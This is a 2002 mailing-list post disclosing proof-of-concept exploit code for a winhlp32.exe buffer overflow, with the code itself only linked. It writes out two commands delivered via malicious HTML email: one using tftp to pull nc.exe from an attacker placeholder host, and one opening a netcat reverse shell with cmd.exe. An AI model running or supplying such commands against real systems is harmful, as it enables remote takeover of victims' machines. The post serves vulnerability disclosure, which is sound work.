winhlp32.exe buffer overflow exploit code.

From: Gary O'leary-Steele (
Date: Mon Aug 12 2002 - 11:22:10 EDT

Hello all,

For some reason my previous posts did not make it onto security focus ?-)

The following is a link to proof of concept code /exploit code for this
overflow. The shell code is relatively small but effective if used
correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and
a html output file. There are two versions included in the zip. // Was written to work with my machine Kernel32.dll version
5.0.2195.4272 (Rare ?) // Was written to work with all other machines I tested.
kernel32.dll version 5.0.2195.2778

I have tested the exploit using two html emails.

email 1 Executes tftp.exe -i my.ip.address get nc.exe

email 2 Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly exitprocess()is called so no error occurs.

Kind Regards
Gary O'leary-Steele
XScan Team

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